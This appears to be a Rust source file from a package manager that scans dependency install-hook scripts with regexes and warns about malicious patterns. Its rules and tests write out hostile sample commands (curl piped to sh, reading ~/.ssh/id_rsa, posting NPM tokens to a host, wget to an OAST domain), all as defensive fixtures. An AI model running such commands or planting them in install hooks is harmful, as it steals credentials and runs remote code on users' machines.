Skip to main content

aube_scripts/
content_sniff.rs

1//! Lightweight content scanner for dependency lifecycle script
2//! bodies.
3//!
4//! Pattern-matches dangerous shapes — shell-pipe (`curl … | sh`),
5//! base64-deobfuscation (`eval(atob(…))`), credential-file reads
6//! (`~/.ssh`, `~/.npmrc`), secret-shaped `process.env` reads,
7//! exfiltration endpoints (Discord/Telegram webhooks, OAST hosts,
8//! bare-IP HTTP) — in a package's `preinstall` / `install` /
9//! `postinstall` scripts. Fired before the user is prompted to
10//! approve a build so the prompt can carry more than just
11//! `name@version`.
12//!
13//! Pure regex matching — no AST parse, no shell-quoting awareness.
14//! False positives are possible (an SDK that legitimately hits a
15//! Discord webhook from a `postinstall` would flag), but lifecycle
16//! script bodies are short and almost never contain bare
17//! `curl … | sh` legitimately, so the FP rate is low in practice.
18//!
19//! Sniffing is advisory: it never blocks an install or write. The
20//! existing `BuildPolicy` allowlist remains the only gate on
21//! whether scripts actually execute.
22
23use aube_manifest::PackageJson;
24use regex::Regex;
25use std::sync::OnceLock;
26
/// Classification of the reason a lifecycle script body was flagged.
///
/// Every variant has a one-line [`description`](Self::description)
/// meant for the user-facing warning, and a short
/// [`category`](Self::category) marker for interactive surfaces
/// (`aube approve-builds` picker labels) that only have room for a tag.
///
/// The derived `PartialOrd` / `Ord` compare by variant declaration
/// order, so the order of the variants below is part of the type's
/// behavior — do not reshuffle them casually. The ordering exists so
/// that `Suspicion` (and therefore `Vec<Suspicion>`) can derive `Ord`,
/// which `IgnoredEntry`'s derived `Ord` relies on.
#[derive(Clone, Copy, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)]
pub enum SuspicionKind {
    /// A remote payload is fetched and piped straight into a shell:
    /// `curl … | sh`, `wget … | bash`, and similar.
    ShellPipe,
    /// A base64 string is decoded at runtime and executed, e.g.
    /// `eval(atob(…))` or `Function(atob(…))`. Common dropper shape.
    EvalDecode,
    /// The script touches credential files (`~/.ssh`, `~/.aws`,
    /// `~/.npmrc`, `~/.config/gh`) that a lifecycle script has no
    /// business reading.
    CredentialFileRead,
    /// The script reads a secret-shaped environment variable such as
    /// `process.env.*TOKEN`, `*SECRET`, `*API_KEY` — the usual way
    /// CI secrets get exfiltrated.
    SecretEnvRead,
    /// The script references a known exfiltration channel:
    /// `discord.com/api/webhooks/`, `api.telegram.org/bot`, or an OAST
    /// collaborator host (`oast.pro`, `interactsh`, `webhook.site`,
    /// `pipedream.net`, `ngrok.io`, …).
    ExfilEndpoint,
    /// The script targets a bare-IP HTTP URL (`http://1.2.3.4/…`).
    /// Legitimate packages use DNS names; bare IPs are dropper / C2
    /// staging.
    BareIpHttp,
}
57
58impl SuspicionKind {
59    pub fn description(self) -> &'static str {
60        match self {
61            Self::ShellPipe => "pipes downloaded content to a shell (curl | sh)",
62            Self::EvalDecode => "decodes and evaluates a base64 payload at runtime",
63            Self::CredentialFileRead => "reads from a credential file (~/.ssh, ~/.aws, ~/.npmrc)",
64            Self::SecretEnvRead => "reads a secret-shaped environment variable",
65            Self::ExfilEndpoint => "contacts a known exfiltration endpoint",
66            Self::BareIpHttp => "contacts a bare-IP HTTP host",
67        }
68    }
69
70    /// Short tag for compact UIs (picker labels). 1–2 words.
71    pub fn category(self) -> &'static str {
72        match self {
73            Self::ShellPipe => "curl|sh",
74            Self::EvalDecode => "eval+decode",
75            Self::CredentialFileRead => "creds read",
76            Self::SecretEnvRead => "secret env",
77            Self::ExfilEndpoint => "exfil URL",
78            Self::BareIpHttp => "bare-IP HTTP",
79        }
80    }
81}
82
83/// One match against a script body.
84#[derive(Debug, Clone, PartialEq, Eq, PartialOrd, Ord)]
85pub struct Suspicion {
86    pub kind: SuspicionKind,
87    /// Name of the lifecycle hook whose body matched
88    /// (`preinstall` / `install` / `postinstall`).
89    pub hook: &'static str,
90}
91
/// The lifecycle hooks whose script bodies get scanned, in scan order.
/// Mirrors [`crate::DEP_LIFECYCLE_HOOKS`].
///
/// `prepare` is deliberately absent: aube doesn't run it for installed
/// tarballs (only for the root package and git-dep preparation), so a
/// finding there would be noise the user has no path to act on.
const SNIFFED_HOOKS: &[&str] = &[
    "preinstall",
    "install",
    "postinstall",
];
97
98struct Rule {
99    kind: SuspicionKind,
100    pattern: &'static str,
101}
102
103const RULES: &[Rule] = &[
104    Rule {
105        kind: SuspicionKind::ShellPipe,
106        // `curl …` or `wget …` followed eventually by `| sh|bash|zsh|node`,
107        // including the path-qualified variants `| /bin/sh`,
108        // `| /usr/local/bin/bash`, etc. `[^\n]*?` keeps the match within
109        // one line so multi-line scripts don't bridge unrelated commands.
110        pattern: r"(?i)\b(?:curl|wget)\b[^\n]*?\|\s*(?:[/\w]*/)?(?:sh|bash|zsh|node)\b",
111    },
112    Rule {
113        kind: SuspicionKind::EvalDecode,
114        pattern: r"(?i)\b(?:eval|Function)\s*\([^)]*\b(?:atob|Buffer\s*\.\s*from)\b",
115    },
116    Rule {
117        kind: SuspicionKind::CredentialFileRead,
118        // `~/.ssh`, `~/.aws`, `~/.npmrc`, `~/.config/gh`, plus the
119        // `$HOME/…` and `${HOME}/…` shell-expansion variants.
120        pattern: r"(?:~|\$\{?HOME\}?)/(?:\.ssh|\.aws|\.npmrc|\.config/gh)\b",
121    },
122    Rule {
123        kind: SuspicionKind::SecretEnvRead,
124        // `process.env.TOKEN`, `process.env.NPM_TOKEN`,
125        // `process.env.AWS_SECRET_ACCESS_KEY`, etc. The prefix and
126        // suffix character classes are zero-or-more so the bare
127        // keyword form (`process.env.TOKEN`) matches without needing a
128        // surrounding identifier — without that, greedy backtracking
129        // never repositions the alternation onto the keyword's first
130        // character. The keyword still has to appear verbatim, which
131        // keeps `process.env.NODE_DEBUG` from flagging.
132        pattern: r"\bprocess\s*\.\s*env\s*\.\s*[A-Z0-9_]*(?:TOKEN|SECRET|PASSWORD|API_?KEY|ACCESS_KEY|PRIVATE_KEY|AUTH)[A-Z0-9_]*\b",
133    },
134    Rule {
135        kind: SuspicionKind::ExfilEndpoint,
136        pattern: r"(?i)\b(?:discord(?:app)?\.com/api/webhooks/|api\.telegram\.org/bot|burpcollaborator\.net|interactsh\.com|oast\.(?:pro|live|fun|me|site|us|asia)|requestbin\.com|webhook\.site|pipedream\.net|ngrok\.io)",
137    },
138    Rule {
139        kind: SuspicionKind::BareIpHttp,
140        // Trailing class catches the post-octet character in every
141        // shape exfil scripts actually use: `/`, `:`, end-of-text,
142        // whitespace (line break or space-delimited curl flag),
143        // quote / paren / `?` / `#`. `.` is intentionally excluded so
144        // DNS hosts that happen to lead with four digit-groups
145        // (`1.2.3.4.example.com`) don't flag.
146        pattern: r#"https?://(?:\d{1,3}\.){3}\d{1,3}(?:[:/\s'"?#)]|$)"#,
147    },
148];
149
150fn compiled() -> &'static [(SuspicionKind, Regex)] {
151    static COMPILED: OnceLock<Vec<(SuspicionKind, Regex)>> = OnceLock::new();
152    COMPILED.get_or_init(|| {
153        RULES
154            .iter()
155            .map(|r| {
156                // RULES is a fixed compile-time table that ships with
157                // aube-scripts, so a bad pattern is a programmer bug
158                // we want to know about at startup, not silently swallow.
159                let re = Regex::new(r.pattern)
160                    .expect("content_sniff rule failed to compile - fix the pattern");
161                (r.kind, re)
162            })
163            .collect()
164    })
165}
166
167/// Scan a dep's manifest for suspicious lifecycle script bodies.
168/// Returns one [`Suspicion`] per (hook, rule) pair that matched.
169/// Empty result for packages with no scripts or no matches.
170pub fn sniff_lifecycle(manifest: &PackageJson) -> Vec<Suspicion> {
171    let mut out = Vec::new();
172    for hook in SNIFFED_HOOKS {
173        let Some(body) = manifest.scripts.get(*hook) else {
174            continue;
175        };
176        for (kind, re) in compiled() {
177            if re.is_match(body) {
178                out.push(Suspicion { kind: *kind, hook });
179            }
180        }
181    }
182    out
183}
184
#[cfg(test)]
mod tests {
    use super::*;
    use std::collections::BTreeMap;

    /// Builds a manifest whose `scripts` map holds exactly the given
    /// `(hook, body)` pairs; every other field is defaulted.
    fn manifest_of(entries: &[(&str, &str)]) -> PackageJson {
        let scripts: BTreeMap<String, String> = entries
            .iter()
            .map(|&(hook, body)| (hook.to_string(), body.to_string()))
            .collect();
        PackageJson {
            scripts,
            ..PackageJson::default()
        }
    }

    /// Sniffs a single-hook manifest and returns the kinds that fired,
    /// in report order.
    fn flagged(hook: &str, body: &str) -> Vec<SuspicionKind> {
        sniff_lifecycle(&manifest_of(&[(hook, body)]))
            .iter()
            .map(|s| s.kind)
            .collect()
    }

    /// True when sniffing the single-hook manifest reports `kind`
    /// (possibly alongside other kinds).
    fn flags_kind(hook: &str, body: &str, kind: SuspicionKind) -> bool {
        flagged(hook, body).contains(&kind)
    }

    #[test]
    fn empty_manifest_is_clean() {
        let findings = sniff_lifecycle(&PackageJson::default());
        assert!(findings.is_empty());
    }

    #[test]
    fn benign_postinstall_is_clean() {
        assert!(flagged("postinstall", "node ./scripts/copy-types.js").is_empty());
    }

    #[test]
    fn classic_curl_sh_flags() {
        assert_eq!(
            flagged("postinstall", "curl https://example.com/install.sh | sh"),
            [SuspicionKind::ShellPipe]
        );
    }

    #[test]
    fn wget_pipe_bash_flags() {
        assert_eq!(
            flagged("install", "wget -qO- http://x.test/i | bash"),
            [SuspicionKind::ShellPipe]
        );
    }

    #[test]
    fn path_qualified_shell_flags() {
        // Path-qualified interpreters (`| /bin/sh`,
        // `| /usr/local/bin/bash`, …) are common in exfil scripts and
        // would slip past a rule anchored on the bare shell name.
        assert_eq!(
            flagged(
                "postinstall",
                "curl https://example.com/install.sh | /bin/sh"
            ),
            [SuspicionKind::ShellPipe]
        );
    }

    #[test]
    fn curl_to_file_does_not_flag_pipe() {
        // Downloading to a file (`curl -o file.tar.gz`) is the
        // prebuild-install / sharp shape — common and benign. Only the
        // pipe-to-shell form is suspicious.
        let found = flagged(
            "install",
            "curl -L https://github.com/x/y/releases/download/v1/y-linux.tar.gz -o y.tar.gz",
        );
        assert!(found.is_empty());
    }

    #[test]
    fn eval_atob_flags() {
        assert_eq!(
            flagged("preinstall", "node -e \"eval(atob('cGF5bG9hZA=='))\""),
            [SuspicionKind::EvalDecode]
        );
    }

    #[test]
    fn function_buffer_from_flags() {
        assert_eq!(
            flagged(
                "postinstall",
                "node -e 'new Function(Buffer.from(p, \"base64\").toString())()'"
            ),
            [SuspicionKind::EvalDecode]
        );
    }

    #[test]
    fn ssh_dir_read_flags() {
        assert_eq!(
            flagged("postinstall", "cat ~/.ssh/id_rsa | base64"),
            [SuspicionKind::CredentialFileRead]
        );
    }

    #[test]
    fn home_npmrc_read_flags() {
        assert_eq!(
            flagged("postinstall", "cat $HOME/.npmrc"),
            [SuspicionKind::CredentialFileRead]
        );
    }

    #[test]
    fn brace_home_aws_read_flags() {
        assert_eq!(
            flagged("postinstall", "tar c ${HOME}/.aws/credentials"),
            [SuspicionKind::CredentialFileRead]
        );
    }

    #[test]
    fn config_gh_read_flags() {
        assert_eq!(
            flagged("postinstall", "cat ~/.config/gh/hosts.yml"),
            [SuspicionKind::CredentialFileRead]
        );
    }

    #[test]
    fn process_env_npm_token_flags() {
        assert_eq!(
            flagged(
                "postinstall",
                "node -e 'fetch(\"https://h.test\", {body: process.env.NPM_TOKEN})'"
            ),
            [SuspicionKind::SecretEnvRead]
        );
    }

    #[test]
    fn process_env_bare_token_flags() {
        // The keyword with no identifier prefix at all is the simplest
        // exfil shape, and the one a rule demanding a non-empty prefix
        // would miss.
        assert_eq!(
            flagged(
                "postinstall",
                "node -e 'fetch(x, {body: process.env.TOKEN})'"
            ),
            [SuspicionKind::SecretEnvRead]
        );
    }

    #[test]
    fn process_env_token_with_trailing_suffix_flags() {
        // Trailing identifier characters (`_VALUE`, `_RAW`, …) after
        // the keyword must still satisfy the closing `\b` anchor.
        assert_eq!(
            flagged(
                "postinstall",
                "node -e 'console.log(process.env.NPM_TOKEN_VALUE)'"
            ),
            [SuspicionKind::SecretEnvRead]
        );
    }

    #[test]
    fn process_env_aws_secret_access_key_flags() {
        assert_eq!(
            flagged(
                "postinstall",
                "node -e 'console.log(process.env.AWS_SECRET_ACCESS_KEY)'"
            ),
            [SuspicionKind::SecretEnvRead]
        );
    }

    #[test]
    fn process_env_node_debug_does_not_flag() {
        // A common, benign env read: no secret-shaped keyword, so the
        // rule must stay quiet.
        let found = flagged(
            "postinstall",
            "node -e 'if (process.env.NODE_DEBUG) console.log(\"debug\")'",
        );
        assert!(found.is_empty());
    }

    #[test]
    fn discord_webhook_flags() {
        assert!(flags_kind(
            "postinstall",
            "curl -X POST https://discord.com/api/webhooks/123/abc -d @-",
            SuspicionKind::ExfilEndpoint,
        ));
    }

    #[test]
    fn telegram_bot_flags() {
        assert!(flags_kind(
            "postinstall",
            "curl -s 'https://api.telegram.org/bot$T/sendMessage?chat_id=1&text=ok'",
            SuspicionKind::ExfilEndpoint,
        ));
    }

    #[test]
    fn webhook_site_flags() {
        assert!(flags_kind(
            "postinstall",
            "curl https://webhook.site/abcd",
            SuspicionKind::ExfilEndpoint,
        ));
    }

    #[test]
    fn oast_pro_flags() {
        assert!(flags_kind(
            "postinstall",
            "wget http://abc.oast.pro/$(whoami)",
            SuspicionKind::ExfilEndpoint,
        ));
    }

    #[test]
    fn bare_ip_http_flags() {
        assert!(flags_kind(
            "install",
            "curl http://192.0.2.5:8080/payload",
            SuspicionKind::BareIpHttp,
        ));
    }

    #[test]
    fn bare_ip_no_path_followed_by_flag_flags() {
        // No path component: a space (then a curl flag) ends the host.
        assert!(flags_kind(
            "install",
            "curl http://192.0.2.5 -o payload",
            SuspicionKind::BareIpHttp,
        ));
    }

    #[test]
    fn bare_ip_inside_quoted_url_flags() {
        // The closing single quote ends the host.
        assert!(flags_kind(
            "postinstall",
            "fetch('http://192.0.2.5')",
            SuspicionKind::BareIpHttp,
        ));
    }

    #[test]
    fn bare_ip_on_separate_line_flags() {
        // The IP sits mid-script and is followed by a newline, not
        // end-of-text, so an end-anchor alone would not be enough.
        assert!(flags_kind(
            "postinstall",
            "node setup.js\nwget http://192.0.2.5\necho done",
            SuspicionKind::BareIpHttp,
        ));
    }

    #[test]
    fn dns_name_does_not_flag_as_bare_ip() {
        assert!(!flags_kind(
            "install",
            "curl http://registry.npmjs.org/path",
            SuspicionKind::BareIpHttp,
        ));
    }

    #[test]
    fn dns_with_ip_prefix_does_not_flag_as_bare_ip() {
        // A hostname that merely begins with four digit groups is
        // still a DNS name; a `.` after the fourth group must make
        // the rule decline.
        assert!(!flags_kind(
            "install",
            "curl http://1.2.3.4.example.com/path",
            SuspicionKind::BareIpHttp,
        ));
    }

    #[test]
    fn multiple_hooks_report_separately() {
        let manifest = manifest_of(&[
            ("preinstall", "curl https://x.test/i | sh"),
            ("postinstall", "cat ~/.ssh/id_rsa"),
        ]);
        let found = sniff_lifecycle(&manifest);
        assert_eq!(found.len(), 2);

        let reported = |hook: &str, kind: SuspicionKind| {
            found.iter().any(|s| s.hook == hook && s.kind == kind)
        };
        assert!(reported("preinstall", SuspicionKind::ShellPipe));
        assert!(reported("postinstall", SuspicionKind::CredentialFileRead));
    }

    #[test]
    fn prepare_hook_is_not_sniffed() {
        // aube doesn't run `prepare` for installed tarballs, so a
        // finding there would be noise the user cannot act on.
        assert!(flagged("prepare", "curl https://x.test/i | sh").is_empty());
    }

    #[test]
    fn descriptions_and_categories_are_non_empty() {
        // Sanity guard: every kind carries both user-facing strings.
        let all_kinds = [
            SuspicionKind::ShellPipe,
            SuspicionKind::EvalDecode,
            SuspicionKind::CredentialFileRead,
            SuspicionKind::SecretEnvRead,
            SuspicionKind::ExfilEndpoint,
            SuspicionKind::BareIpHttp,
        ];
        for kind in all_kinds {
            assert!(!kind.description().is_empty());
            assert!(!kind.category().is_empty());
        }
    }
}